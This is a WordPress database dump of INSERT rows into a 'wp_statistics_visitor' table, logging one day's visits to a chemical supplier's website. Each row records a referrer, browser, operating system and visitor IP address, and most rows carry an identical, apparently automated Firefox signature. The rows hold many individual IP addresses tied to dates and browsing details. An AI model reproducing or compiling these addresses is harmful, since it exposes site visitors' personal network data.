INSERT INTO `wp_statistics_visitor` VALUES (8168, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.242.219.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8169, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.102.140.116', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8170, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.60.10.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8171, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.107.208.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8172, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.46.112.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8173, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.12.194.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8174, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.23.57.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8175, '2016-10-20', 'https://www.google.co.uk/', 'Safari', 'iPad', '10.0', '', '86.155.229.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8176, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.205.224.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8177, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.60.18.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8178, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.209.8.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8179, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.82.194.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8180, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.230.195.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8181, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.227.168.220', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8182, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.211.57.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8183, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.96.35.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8184, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '107.197.202.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8185, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.75.11.220', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8186, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.18.140.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8187, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.65.170.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8188, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.247.164.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8189, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.138.185.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8190, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.72.171.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8191, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.78.45.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8192, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.176.111.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8193, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.152.210.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8194, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '64.128.214.5', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8195, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '7.13.1.197', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8196, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.235.84.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8197, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.13.155.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8198, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.6.109.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8199, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.168.61.22', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8200, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.30.141.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8201, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.115.188.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8202, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.138.170.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8203, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.177.174.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8204, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.246.0.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8205, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.202.188.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8206, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.187.235.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8207, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.228.145.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8208, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.75.180.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8209, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.97.212.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8210, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.105.164.188', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8211, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.251.164.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8212, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.182.218.116', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8213, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.132.56.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8214, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.177.47.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8215, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '198.8.80.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8216, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.62.218.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8217, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.47.24.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8218, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.116.187.87', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8219, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.12.53.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8220, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.40.250.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8221, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.233.96.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8222, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.232.144.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8223, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '92.243.95.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8224, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.151.231.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8225, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '173.208.136.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8226, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '131.243.46.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8227, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.173.71.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8228, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.163.241.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8229, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.69.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8230, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.109.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8231, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.41.178.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8232, '2016-10-20', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwi6uJaMiurPAhXEVj4KHeVQBEUQFgg7MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '70.35.215.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8233, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.182.39.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8234, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '172.17.194.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8235, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.8.95.3', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8236, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.67.177.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8237, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '72.29.232.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8238, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.243.22.164', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8239, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '209.147.144.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8240, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.70.132.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8241, '2016-10-20', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=45&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899', 'Chrome', 'Windows', '53.0.2785.143', '', '106.51.17.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8242, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8243, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.178.150.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8244, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '184.156.203.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8245, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.96.255.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8246, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.137.172.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8247, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.16.111.78', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8248, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.12.224.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8249, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '66.111.118.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8250, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.164.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8251, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.93.249.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8252, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.199.32.119', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8253, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.63.159.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8254, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwjQwvnLjOrPAhVBKyYKHYKAADwQFgg-MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw&sig2=kAx1w1K8noqPi-cfZmdYnw', 'MSIE', 'Windows', '11.0', '', '63.138.185.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8255, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.196.113.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8256, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.182.254.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8257, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwju65P0jOrPAhVFQiYKHeqMCRMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '170.29.1.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8258, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.173.5.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8259, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.177.2.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8260, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.16.255.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8261, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '184.90.73.25', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8262, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.21.139.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8263, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.65.116.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8264, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.177.149.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8265, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.137.129.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8266, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.222.126.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8267, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.199.28.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8268, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.34.53.157', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8269, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.237.72.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8270, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.220.212.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8271, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.52.198.244', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8272, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.197.28.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8273, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.121.25.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8274, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.204.187.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8275, '2016-10-20', 'https://www.miller-stephenson.com/mold-release-agents/', 'Safari', 'iPhone', '10.0', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8276, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.89.0.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8277, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.3.107.187', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8278, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.221.198.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8279, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.2.247.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8280, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.149.167.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8281, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.209.173.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8282, '2016-10-20', 'https://www.bing.com/search?q=MS-460H+COATING&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '208.95.25.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8283, '2016-10-20', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8284, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.72.82.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8285, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '14.139.161.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8286, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '108.206.93.103', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8287, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '129.208.62.253', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8288, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.182.156.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8289, '2016-10-20', 'https://kollesa.ru/', 'Opera', 'Windows', '8.01', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8290, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.45.125.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8291, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.116.141.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8292, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.141.233.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8293, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.165.218.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8294, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.43.8.25', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8295, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.17.27.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8296, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.248.181.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8297, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.211.32.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8298, '2016-10-20', 'https://www.adsensecustomsearchads.com/afs/ads?q=BEARING%20LUBRICANT%205.5OZ%20AEROSOLE&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000108&client=amazon&channel=g-channel-92%2Bg-channel-133%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=4&format=n4&ad=n4&nocache=241476992115426&num=0&output=uds_ads_only&v=3&bsl=10&u_his=3&u_tz=-420&dt=1476992115427&u_w=1366&u_h=768&biw=-12245933&bih=-12245933&isw=1122&ish=1&psw=1122&psh=0&frm=2&uio=uv3-&jsv=13959&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '172.218.122.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8299, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '42.115.10.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8300, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.188.248.15', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8301, '2016-10-20', 'https://www.bing.com/search?q=hexion+epoxy+hardener&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8302, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.12.6.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8303, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/', 'MSIE', 'Windows', '9.0', '', '204.79.180.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8304, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.32.219.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8305, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.46.111.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8306, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.93.192.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8307, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.158.210.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8308, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.226.110.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8309, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.235.14.246', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8310, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.194.223.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8311, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.166.128.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8312, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.165.19.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8313, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.125.220.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8314, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.164.180.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8315, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.171.155.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8316, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.12.211.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8317, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.52.83.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8318, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.209.157.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8319, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.234.170.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8320, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.255.36.197', '000', 6, 0); 
